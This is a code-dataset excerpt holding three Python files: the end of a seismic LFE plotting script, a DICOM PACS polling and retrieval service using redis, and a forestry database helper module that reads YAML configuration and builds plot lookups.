datetime(2007, 7, 23, 0, 0, 0)\ntend = datetime(2009, 6, 13, 0, 0, 0)\nthreshold = 0.08\n\n# With FAME data\nax1 = plt.subplot(211)\ndf = pickle.load(open(path + 'LFEs_unknown/080421.14.048/catalog_200707-200912.pkl', 'rb'))\ndf = df.loc[df['cc'] >= threshold]\nX = get_time_series(df, window, tbegin, tend)\nplt.stem(np.arange(0, len(X)), X, 'k-', markerfmt=' ', basefmt=' ')\nplt.xlim([-0.5, len(X) - 0.5])\nplt.ylabel('Number of LFEs', fontsize=24)\nplt.title('Family 080421.14.048', fontsize=24)\nplt.figtext(0.7, 0.8, '{:d} LFEs'.format(np.sum(X)), fontsize=16)\nplt.figtext(0.7, 0.75, '(FAME)', fontsize=16)\n\n# With permanent stations\nax2 = plt.subplot(212)\ndf = pickle.load(open(path + 'LFEs_permanent/080421.14.048/catalog_200707-200912.pkl', 'rb'))\ndf = df.loc[df['cc'] >= threshold]\nX = get_time_series(df, window, tbegin, tend)\nplt.stem(np.arange(0, len(X)), X, 'k-', markerfmt=' ', basefmt=' ')\nplt.xlim([-0.5, len(X) - 0.5])\nplt.xlabel('Time (days) since 2007/07/23', fontsize=24)\nplt.ylabel('Number of LFEs', fontsize=24)\nplt.figtext(0.7, 0.4, '{:d} LFEs'.format(np.sum(X)), fontsize=16)\nplt.figtext(0.6, 0.35, '(permanent networks)', fontsize=16)\n\nplt.savefig('08042114048_permanent.eps', format='eps')\nax1.clear()\nax2.clear()\nplt.close(1)\n", "sub_path": "figures/catalog_SC/08042114048_permanent.py", "file_name": "08042114048_permanent.py", "file_ext": "py", "file_size_in_byte": 3301, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 40, "usage_type": 
"call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pylab.rcParams.update", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pylab.rcParams", "line_number": 57, "usage_type": "attribute"}, {"api_name": "matplotlib.pylab", "line_number": 57, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.stem", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.stem", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figtext", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.close", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}]}
+{"seq_id": "195472959", "text": "import os\r\nimport sys\r\nimport time\r\nimport socket\r\nimport random\r\n\r\nfrom pydicom.dataset import Dataset\r\n\r\nfrom pynetdicom import (AE, QueryRetrievePresentationContexts)\r\n\r\nfrom datetime import datetime\r\nfrom datetime import timedelta, date\r\n\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy import Column, Integer, String, DateTime\r\nfrom sqlalchemy.orm import sessionmaker\r\n\r\nimport redis\r\n\r\nimport traceback\r\n\r\nAE_TITLE = 'SURESIDE'\r\nPEER_AE_TITLE = 'YOUR_DICOM_SERVER_AE_TITLE'\r\nPEER_IP_ADDRESS = 'YOUR_DICOM_SERVER_IP'\r\n\r\nPEER_PORT = 104\r\nCMOVE_AE_TITLE = 'SURESIDE'\r\n\r\nNODE_LIST = []\r\nNODE_LIST.append('localhost')\r\n\r\n### uncomment and edit following parts if clustering is needed\r\n#NODE_LIST.append('160.58.150.64')\r\n#NODE_LIST.append('160.8.12.233')\r\n#NODE_LIST.append('160.59.234.99')\r\n\r\nredis_client_list = []\r\nlocal_redis = None\r\n\r\nfor item in NODE_LIST:\r\n redisClient = redis.StrictRedis(host=item, port=6379, db=0)\r\n redis_client_list.append(redisClient)\r\n if item == 'localhost':\r\n local_redis = redisClient\r\n\r\nBase = declarative_base()\r\n\r\nclass Program_Error(Base):\r\n __tablename__ = 'program_error'\r\n \r\n Id = Column(Integer, autoincrement=True, primary_key=True)\r\n Record_Date_Time = Column(DateTime, nullable=False,default=datetime.now)\r\n Error_Detail = Column(String)\r\n\r\nengine = create_engine('postgresql://rad:rad@localhost:5432/rad_db')\r\n\r\nBase.metadata.create_all(bind=engine)\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\ndef c_find_pacs(date_of_query, time_of_query):\r\n # QueryRetrieveSOPClassList contains the SOP Classes supported\r\n # by the Query/Retrieve Service Class (see PS3.4 Annex C.6)\r\n #ae = AE(ae_title=my_title,scu_sop_class=QueryRetrieveSOPClassList)\r\n \r\n ae = AE(ae_title=AE_TITLE)\r\n ae.requested_contexts = QueryRetrievePresentationContexts\r\n\r\n # Try and associate with the peer AE\r\n # Returns the Association thread\r\n print('Requesting Association with the peer for C-FIND')\r\n assoc = ae.associate(PEER_IP_ADDRESS, int(PEER_PORT), ae_title=PEER_AE_TITLE)\r\n\r\n result_list = []\r\n\r\n if assoc.is_established:\r\n print('Association accepted by the peer')\r\n\r\n # Creat a new DICOM dataset with the attributes to match against\r\n # In this case match any patient's name at the PATIENT query\r\n # level. 
See PS3.4 Annex C.6 for the complete list of possible\r\n # attributes and query levels.\r\n dataset = Dataset()\r\n dataset.ModalitiesInStudy = 'DX\\CR'\r\n dataset.AccessionNumber = ''\r\n dataset.StudyInstanceUID = ''\r\n #dataset.SeriesInstanceUID = ''\r\n #dataset.SOPInstanceUID = ''\r\n \r\n dataset.StudyDate = date_of_query\r\n dataset.StudyTime = time_of_query\r\n dataset.QueryRetrieveLevel = \"STUDY\"\r\n\r\n # Send a DIMSE C-FIND request to the peer\r\n # query_model is the Query/Retrieve Information Model to use\r\n # and is one of 'W', 'P', 'S', 'O'\r\n # 'W' - Modality Worklist (1.2.840.10008.5.1.4.31)\r\n # 'P' - Patient Root (1.2.840.10008.5.1.4.1.2.1.1)\r\n # 'S' - Study Root (1.2.840.10008.5.1.4.1.2.2.1)\r\n # 'O' - Patient/Study Only (1.2.840.10008.5.1.4.1.2.3.1)\r\n responses = assoc.send_c_find(dataset, query_model='S')\r\n \r\n for (status, dataset) in responses:\r\n print (str(status))\r\n #if 'Pending' in str(status):\r\n if dataset:\r\n if dataset.ModalitiesInStudy and dataset.AccessionNumber and dataset.StudyInstanceUID and dataset.StudyDate and dataset.StudyTime:\r\n print ('Modality:' +str(dataset.ModalitiesInStudy))\r\n print ('Accession Number:' +str(dataset.AccessionNumber))\r\n print ('Study Instance UID:' +str(dataset.StudyInstanceUID))\r\n print ('Study Date:' +str(dataset.StudyDate))\r\n print ('Study Time:' +str(dataset.StudyTime))\r\n #print ('Series Instance UID:' +str(dataset.SeriesInstanceUID))\r\n #print('SOP Instance UID:'+ str(dataset.SOPInstanceUID))\r\n \r\n \r\n result_list.append(dataset.StudyInstanceUID)\r\n \r\n #except Exception as e:\r\n #print('Exception: '+ str(e))\r\n #pass\r\n\r\n # Release the association\r\n assoc.release()\r\n return result_list\r\n\r\ndef c_find_pacs_series(study_uid):\r\n # QueryRetrieveSOPClassList contains the SOP Classes supported\r\n # by the Query/Retrieve Service Class (see PS3.4 Annex C.6)\r\n #ae = AE(ae_title=my_title,scu_sop_class=QueryRetrieveSOPClassList)\r\n \r\n ae = AE(ae_title=AE_TITLE)\r\n ae.requested_contexts = QueryRetrievePresentationContexts\r\n result_list = []\r\n\r\n # Try and associate with the peer AE\r\n # Returns the Association thread\r\n print('Requesting Association with the peer for C-FIND')\r\n assoc = ae.associate(PEER_IP_ADDRESS, int(PEER_PORT), ae_title=PEER_AE_TITLE)\r\n\r\n if assoc.is_established:\r\n print('Association accepted by the peer')\r\n\r\n # Creat a new DICOM dataset with the attributes to match against\r\n # In this case match any patient's name at the PATIENT query\r\n # level. 
See PS3.4 Annex C.6 for the complete list of possible\r\n # attributes and query levels.\r\n dataset = Dataset()\r\n dataset.StudyInstanceUID = study_uid\r\n dataset.SeriesInstanceUID = ''\r\n #dataset.SOPInstanceUID = ''\r\n \r\n dataset.QueryRetrieveLevel = \"SERIES\"\r\n\r\n # Send a DIMSE C-FIND request to the peer\r\n # query_model is the Query/Retrieve Information Model to use\r\n # and is one of 'W', 'P', 'S', 'O'\r\n # 'W' - Modality Worklist (1.2.840.10008.5.1.4.31)\r\n # 'P' - Patient Root (1.2.840.10008.5.1.4.1.2.1.1)\r\n # 'S' - Study Root (1.2.840.10008.5.1.4.1.2.2.1)\r\n # 'O' - Patient/Study Only (1.2.840.10008.5.1.4.1.2.3.1)\r\n responses = assoc.send_c_find(dataset, query_model='S')\r\n \r\n for (status, dataset) in responses:\r\n #print (str(status))\r\n #if 'Pending' in str(status):\r\n if dataset:\r\n if dataset.SeriesInstanceUID:\r\n #print ('Series Instance UID:' +str(dataset.SeriesInstanceUID))\r\n #print('SOP Instance UID:'+ str(dataset.SOPInstanceUID))\r\n \r\n result_dict = {'study_uid': study_uid, 'series_uid': dataset.SeriesInstanceUID}\r\n result_list.append(result_dict)\r\n \r\n #except Exception as e:\r\n #print('Exception: '+ str(e))\r\n #pass\r\n\r\n # Release the association\r\n assoc.release()\r\n return result_list\r\n\r\ndef c_find_pacs_image(study_uid, series_uid):\r\n # QueryRetrieveSOPClassList contains the SOP Classes supported\r\n # by the Query/Retrieve Service Class (see PS3.4 Annex C.6)\r\n #ae = AE(ae_title=my_title,scu_sop_class=QueryRetrieveSOPClassList)\r\n \r\n ae = AE(ae_title=AE_TITLE)\r\n ae.requested_contexts = QueryRetrievePresentationContexts\r\n result_list = []\r\n\r\n # Try and associate with the peer AE\r\n # Returns the Association thread\r\n print('Requesting Association with the peer for C-FIND')\r\n assoc = ae.associate(PEER_IP_ADDRESS, int(PEER_PORT), ae_title=PEER_AE_TITLE)\r\n\r\n if assoc.is_established:\r\n print('Association accepted by the peer')\r\n\r\n # Creat a new DICOM dataset with the attributes to match against\r\n # In this case match any patient's name at the PATIENT query\r\n # level. 
See PS3.4 Annex C.6 for the complete list of possible\r\n # attributes and query levels.\r\n dataset = Dataset()\r\n dataset.StudyInstanceUID = study_uid\r\n dataset.SeriesInstanceUID = series_uid\r\n dataset.SOPInstanceUID = ''\r\n \r\n dataset.QueryRetrieveLevel = \"IMAGE\"\r\n\r\n # Send a DIMSE C-FIND request to the peer\r\n # query_model is the Query/Retrieve Information Model to use\r\n # and is one of 'W', 'P', 'S', 'O'\r\n # 'W' - Modality Worklist (1.2.840.10008.5.1.4.31)\r\n # 'P' - Patient Root (1.2.840.10008.5.1.4.1.2.1.1)\r\n # 'S' - Study Root (1.2.840.10008.5.1.4.1.2.2.1)\r\n # 'O' - Patient/Study Only (1.2.840.10008.5.1.4.1.2.3.1)\r\n responses = assoc.send_c_find(dataset, query_model='S')\r\n \r\n for (status, dataset) in responses:\r\n #print (str(status))\r\n #if 'Pending' in str(status):\r\n if dataset:\r\n if dataset.SOPInstanceUID:\r\n #print('SOP Instance UID:'+ str(dataset.SOPInstanceUID))\r\n result_dict = {'study_uid': study_uid, 'series_uid': dataset.SeriesInstanceUID, 'img_uid':dataset.SOPInstanceUID}\r\n result_list.append(result_dict)\r\n \r\n #except Exception as e:\r\n #print('Exception: '+ str(e))\r\n #pass\r\n\r\n # Release the association\r\n assoc.release()\r\n return result_list\r\n\r\ndef c_move_pacs(study_uid, series_uid, img_uid):\r\n \r\n ae = AE(ae_title=AE_TITLE)\r\n ae.requested_contexts = QueryRetrievePresentationContexts\r\n print('Requesting Association with the peer for C-MOVE')\r\n assoc = ae.associate(PEER_IP_ADDRESS, int(PEER_PORT),ae_title=PEER_AE_TITLE)\r\n\r\n if assoc.is_established:\r\n print('Association accepted by the peer')\r\n\r\n dataset = Dataset()\r\n dataset.StudyInstanceUID = study_uid\r\n dataset.SeriesInstanceUID = series_uid\r\n dataset.SOPInstanceUID = img_uid\r\n dataset.QueryRetrieveLevel = \"IMAGE\"\r\n \r\n \r\n responses = assoc.send_c_move(dataset, CMOVE_AE_TITLE,query_model='S')\r\n\r\n for (status, dataset) in responses:\r\n #print (str(status))\r\n pass\r\n \r\n # Release the association\r\n assoc.release()\r\n\r\ndef main():\r\n ##\r\n ## Main loop for C-Move.\r\n ## \r\n\r\n\r\n while True:\r\n try:\r\n now = datetime.now()\r\n print(now)\r\n fifteenth_min_before_time = now - timedelta(minutes=15)\r\n query_date = fifteenth_min_before_time.strftime(\"%Y%m%d\")\r\n query_time = fifteenth_min_before_time.strftime(\"%H%M%S\") + '-' + now.strftime(\"%H%M%S\")\r\n print(query_date)\r\n print(query_time)\r\n \r\n series_uid_list = []\r\n img_uid_list = []\r\n study_result = c_find_pacs(query_date, query_time)\r\n for item in study_result:\r\n series_result = c_find_pacs_series(item)\r\n series_uid_list.extend(series_result)\r\n for item in series_uid_list:\r\n img_result = c_find_pacs_image(item['study_uid'], item['series_uid'])\r\n img_uid_list.extend(img_result)\r\n \r\n \r\n for item in img_uid_list:\r\n image_exist_list = []\r\n for redis_client in redis_client_list:\r\n try:\r\n redis_exist =redis_client.sismember('instance_uid_set', str(item['img_uid']))\r\n image_exist_list.append(redis_exist)\r\n except:\r\n print('Redis connection error')\r\n pass\r\n print(image_exist_list)\r\n\r\n if any(image_exist_list):\r\n print(\"Skip cmove, SOP Instance UID exists in redis record!\")\r\n else:\r\n c_move_pacs(item['study_uid'], item['series_uid'], item['img_uid'])\r\n local_redis.sadd('instance_uid_set', str(item['img_uid']))\r\n \r\n # cmove_list = []\r\n \r\n # for key, value in cfind_result.items():\r\n # study_instance_uid = key\r\n # number_of_image = value\r\n # combined = study_instance_uid + '_' + 
number_of_image\r\n \r\n # study_exist_list = []\r\n \r\n # for item in session_list:\r\n # session = item['session']\r\n # exists_at_record = session.query(exists().where(CFIND_Study_UID.Study_UID == combined)).scalar()\r\n # study_exist_list.append(exists_at_record)\r\n # session.close()\r\n \r\n # if not any(study_exist_list):\r\n # cmove_list.append(study_instance_uid)\r\n \r\n # for item in cmove_list:\r\n # c_move_pacs(item)\r\n \r\n \r\n # for key, value in cfind_result.items():\r\n # study_instance_uid = key\r\n # number_of_image = value\r\n # combined = study_instance_uid + '_' + number_of_image\r\n # for item in session_list:\r\n # session =item['session']\r\n # if item['ip_address'] == 'localhost':\r\n # input_row = CFIND_Study_UID(Study_UID=combined)\r\n # session.add(input_row)\r\n # session.commit()\r\n except:\r\n print(traceback.format_exc())\r\n record = Program_Error(Error_Detail = traceback.format_exc())\r\n session.add(record)\r\n session.commit()\r\n pass\r\n sleep_time = random.randint(10, 60) \r\n time.sleep(sleep_time)\r\n \r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "DR_Warnings/server/c_move_server/c_move_service.py", "file_name": "c_move_service.py", "file_ext": "py", "file_size_in_byte": 13742, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "redis.StrictRedis", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 52, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 52, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 53, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 53, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 54, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 54, "usage_type": "argument"}, {"api_name": "sqlalchemy.create_engine", "line_number": 56, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 59, "usage_type": "call"}, {"api_name": "pynetdicom.AE", "line_number": 67, "usage_type": "call"}, {"api_name": "pynetdicom.QueryRetrievePresentationContexts", "line_number": 68, "usage_type": "name"}, {"api_name": "pydicom.dataset.Dataset", "line_number": 84, "usage_type": "call"}, {"api_name": "pynetdicom.AE", "line_number": 133, "usage_type": "call"}, {"api_name": "pynetdicom.QueryRetrievePresentationContexts", "line_number": 134, "usage_type": "name"}, {"api_name": "pydicom.dataset.Dataset", "line_number": 149, "usage_type": "call"}, {"api_name": "pynetdicom.AE", "line_number": 189, "usage_type": "call"}, {"api_name": "pynetdicom.QueryRetrievePresentationContexts", "line_number": 190, "usage_type": "name"}, {"api_name": "pydicom.dataset.Dataset", "line_number": 205, "usage_type": "call"}, {"api_name": "pynetdicom.AE", "line_number": 240, "usage_type": "call"}, {"api_name": "pynetdicom.QueryRetrievePresentationContexts", "line_number": 241, "usage_type": "name"}, {"api_name": "pydicom.dataset.Dataset", "line_number": 248, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 272, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 272, "usage_type": "name"}, {"api_name": 
"datetime.timedelta", "line_number": 274, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 341, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 342, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 346, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 347, "usage_type": "call"}]}
+{"seq_id": "332749985", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport yaml\nimport pymssql\nimport sqlite3\n\nHERE = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, os.path.join(HERE))\n\n\"\"\"\npoptree_basis.py contains the classes for connecting to the databases and reference files\n\"\"\"\n\nclass YamlConn(object):\n \"\"\" This class connects to the YAML files containing the configuration to run the ptree program, including the database connection in the Config File and the Queries in the Query File.\n\n :Example:\n \n >>> A = YamlConn()\n >>> A.configfilename = \"config_2.yaml\"\n >>> A.config = \n >>> A.queries= \n >>> = A.sql_connect()\n\n .. warning:: pymssql dependency.\n\n METHODS\n\n \"\"\"\n def __init__(self):\n self.configfilename = os.path.join(HERE, \"config_2.yaml\")\n self.config = yaml.load(open(self.configfilename,'rb'))\n self.queries = yaml.load(open(os.path.join(HERE, self.config['query_file']), 'rb'))\n\n\n def sql_connect(self):\n \"\"\" Connects to the MS SQL server database\n\n Configuration parameters are in config_2.yaml file. \n \"\"\"\n sql_server = self.config['server']\n sql_user = self.config['user']\n sql_pw = self.config['password']\n sql_db = self.config['database']\n conn = pymssql.connect(server = sql_server, user=sql_user, password=sql_pw, database = sql_db)\n cur = conn.cursor()\n return conn, cur\n\n def lite3_connect(self):\n \"\"\" Connects to the SQLite3 database\n\n Configuration parameters are in config_2.yaml file. \n \"\"\"\n lite3conn = None\n\n lite3db = self.config['litedb']\n try:\n lite3conn = sqlite3.connect(lite3db)\n lite3cur = lite3conn.cursor()\n\n except sqlite3.Error as e:\n if lite3conn:\n lite3con.rollback()\n\n print(\"Error : \",e.args[0])\n sys.exit(1)\n return lite3conn, lite3cur\n\nclass DetailCapture(object):\n \"\"\" This class creates a dictionary for stands and plots to reference if a plot is a detail plot, when it is a detail plot, which stand it is in, and the minimum dbh from that plot, which is the threshold for it being included in the main inventory or not. \n\n The detail_reference dictionary is extended, which the expansion dictionary is condensed. This is mostly beacuse I''m not sure which will be the most useful yet. Call this dictionary ahead of calling anything from plots, trees, or stands to save big time. 
Otherwise there are so many queries\n\n :Example:\n >>> import poptree_basis\n >>> A.detail_reference.keys()\n >>> dict_keys(['AB08', 'AV14', 'AR07', 'RS01', 'TO11', 'AM16', 'AX15', 'RS29', 'RS02', 'RS30', 'RS28', 'TB13', 'RS32', 'AG05', 'TO04', 'AE10', 'RS31', 'PP17', 'AV06'])\n >>> A.detail_reference['AV14'].keys()\n >>> dict_keys([1984, 2000, 1990, 2008, 1978, 1995])\n >>> A.detail_reference['AV14'][1984].keys()\n >>> dict_keys([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16])\n >>> A.detail_reference['AV14'][1984][1]\n >>> {'detail': False, 'area': 625, 'min': 5.0}\n\n >>> A.umins_reference['HR02'][1984][1]\n >>> 5.0\n\n >>> A.uplot_areas['MH03'].keys()\n >>> dict_keys([1952, 1989, 1994, 1965, 1934, 1999, 1971, 2005, 1945, 1939, 1930, 1983])\n >>> A.uplot_areas['MH03'][1952].keys()\n >>> dict_keys([1])\n >>> A.uplot_areas['MH03'][1952][1]\n >>> 4047.0\n\n\n :A: is an instance of the detail_reference object, used for reference here.\n :A.detail_reference.[standid]: the stand, containing the years that stand \n :A.detail_reference.[standid][year]: the plots on that stand and year when at least 1 plot is detail\n :A.detail_reference.[standid][year][plotno]['detail']: Boolean True or False if a detail plot on that stand and plot and year\n :A.detail_reference.[standid][year][plotno]['area']: the area of that plot\n :A.detail_reference.[standid][year][plotno]['min']: the minimum dbh on that detail plot\n\n :A.umins_reference.[standid]: stands whose minimum dbhs in at least 1 year are not 15.\n :A.umins_reference.[standid][year]: the plots on that stand and year when at least 1 plot has a minimum dbh that is not 15\n :A.umins_reference[standid][year][plotno]: the minimum dbh for that stand, plot, and year, which is not 15.0\n\n :A.expansion[standid][year][plotid]: the expansion factor for the stand, year, and plot which will not be 1.0\n\n :A.uplots_areas[standid]: stands whose areas in at least 1 year are not 625 m2\n :A.uplots_areas[standid][year]: the plots on that stand and year when at least 1 plot has an area not 625 m2\n :A.uplots_areas[standid][year][plotno]: the area for the stand, year, and plot that is not 625\n\n \"\"\"\n def __init__(self):\n self.pconn, self.pcur = YamlConn().lite3_connect()\n self.detail_reference = {}\n self.expansion = {}\n self.uplot_areas = {}\n self.umins_reference = {}\n\n self.create_detail_reference()\n self.condense_detail_reference()\n self.contains_unusual_plots()\n self.create_unusual_mins_reference()\n\n def create_detail_reference(self):\n \"\"\" This function creates a lookup for detail plots that any tree or stand can use\n\n .. 
Example : \n >>> H = DetailCapture.detail_reference.keys()\n\n \"\"\"\n stands_with_details = []\n sql = YamlConn().queries['stand']['lite_context_dtl']\n self.pcur.execute(sql)\n \n for row in self.pcur:\n stands_with_details.append(str(row[0]))\n\n\n for each_stand in stands_with_details:\n\n if each_stand not in self.detail_reference:\n self.detail_reference[each_stand] = {}\n elif each_stand in self.detail_reference:\n pass\n\n sql = YamlConn().queries['stand']['lite_context_dtl_2'].format(standid=each_stand)\n self.pcur.execute(sql)\n \n for row in self.pcur:\n plotno = int(row[0])\n year = int(row[1])\n detail = str(row[2])\n \n # default area is 625\n try:\n area = int(row[3])\n except Exception:\n area = 625\n\n # default min dbh is 5\n try:\n mindbh = round(float(row[4]),1)\n except Exception:\n mindbh = 5.0\n\n if year not in self.detail_reference[each_stand] and detail == 'T':\n self.detail_reference[each_stand][year]={plotno:{'area': area, 'detail': True, 'min': mindbh}}\n elif year in self.detail_reference[each_stand] and detail == 'T':\n self.detail_reference[each_stand][year][plotno] = {'area': area, 'detail': True, 'min': mindbh}\n elif year not in self.detail_reference[each_stand] and detail != 'T':\n self.detail_reference[each_stand][year]={plotno:{'area':area, 'detail': False, 'min': mindbh}}\n elif year in self.detail_reference[each_stand] and detail !='T':\n self.detail_reference[each_stand][year][plotno] = {'area':area, 'detail':False, 'min':mindbh}\n\n else:\n pass\n\n def create_unusual_mins_reference(self):\n \"\"\" This function creates a lookup for plots that do not have minimums of 15, but are not detail plots.\n\n Queries the plot table for plots where detailPlot is not true and minimum DBH is not 15. \n :umins_reference: a lookup by stand, year, and plot for the minimum dbh of plots whose minimum dbh is not 15 and are not detail plots\n \"\"\"\n \n sql = YamlConn().queries['stand']['query_unusual_plot_minimums']\n self.pcur.execute(sql)\n \n for row in self.pcur:\n\n try:\n mindbh = round(float(row[3]),3)\n except Exception:\n mindbh = 5.0\n\n try:\n \n if str(row[0]) not in self.umins_reference:\n self.umins_reference[str(row[0])] = {int(row[2]) :{int(row[1]): mindbh}}\n\n elif str(row[0]) in self.umins_reference:\n if int(row[2]) not in self.umins_reference[str(row[0])]:\n self.umins_reference[str(row[0])][int(row[2])] = {int(row[1]) :mindbh}\n\n elif int(row[2]) in self.umins_reference[str(row[0])]:\n if int(row[1]) not in self.umins_reference[str(row[0])][int(row[2])]:\n self.umins_reference[str(row[0])][int(row[2])][int(row[1])] = mindbh\n else:\n print(\"some error has occurred in finding unusual minimums on not-detail plots\")\n except Exception as e17:\n pass\n\n def condense_detail_reference(self):\n \"\"\" Condenses the detail reference into a readable dictionary of expansion factors by plot\n\n\n Use the attribute of expansion to quickly look up the expansion factor, given a stand, year, and plot\n .. math : given tree attribute * (area of all plots / area of all detail plots) = scaled tree attribute\n\n .. 
math : 10 Mg Biomass in small trees on detail plots * (10000 m2 all plots / 2000 m2 detail plots) = 50 Mg Biomass on detail plots\n\n \"\"\"\n \n for each_stand in self.detail_reference.keys():\n for each_year in self.detail_reference[each_stand].keys():\n \n try:\n total_area = sum([self.detail_reference[each_stand][each_year][x]['area'] for x in self.detail_reference[each_stand][each_year].keys()])\n except Exception as e3:\n total_area = sum([self.detail_reference[each_stand][each_year][x]['area'] for x in self.detail_reference[each_stand][each_year].keys() if x != None])\n\n \n try:\n detail_area = sum([self.detail_reference[each_stand][each_year][x]['area'] for x in self.detail_reference[each_stand][each_year].keys() if self.detail_reference[each_stand][each_year][x]['detail'] is not False])\n except Exception as e3:\n detail_area = sum([self.detail_reference[each_stand][each_year][x]['area'] for x in self.detail_reference[each_stand][each_year].keys() if self.detail_reference[each_stand][each_year][x]['detail'] is not False and self.detail_reference[each_stand][each_year][x]['detail'] != None])\n\n try:\n expansion_factor_to_stand = round(float(total_area/detail_area),2)\n except Exception as e4:\n expansion_factor_to_stand = 1.\n\n if each_stand not in self.expansion:\n self.expansion[each_stand] = {each_year:expansion_factor_to_stand}\n elif each_stand in self.expansion:\n if each_year not in self.expansion[each_stand]:\n self.expansion[each_stand][each_year] = expansion_factor_to_stand\n else:\n pass\n\n def contains_unusual_plots(self):\n \"\"\" A lookup table for stands, plots, and years which have areas other than 625 m\n\n The query from 'query_unusual_plot' finds standid, plot, year, and area of all plots whose areas are not 625 m, in that order, and creates a nested look up to be passed to stand objects, so that only sql hits have to be performed when we can't assume 625.\n \"\"\"\n\n sql = YamlConn().queries['stand']['query_unusual_plot']\n self.pcur.execute(sql)\n \n for row in self.pcur:\n try: \n area = round(float(row[3]),2)\n except Exception as e8:\n area = None\n\n try:\n plot = int(row[2])\n except Exception:\n plot = None\n\n try:\n if str(row[0]) not in self.uplot_areas:\n self.uplot_areas[str(row[0])]={plot:{int(row[1]): area}}\n elif str(row[0]) in self.uplot_areas:\n if plot not in self.uplot_areas[str(row[0])]:\n self.uplot_areas[str(row[0])][plot] = {int(row[1]): area}\n elif plot in self.uplot_areas[str(row[0])]: \n self.uplot_areas[str(row[0])][plot].update({int(row[1]): area})\n except Exception as e9:\n pass", "sub_path": "poptree_basis.py", "file_name": "poptree_basis.py", "file_ext": "py", "file_size_in_byte": 12527, "program_lang": "python", "lang": "en", 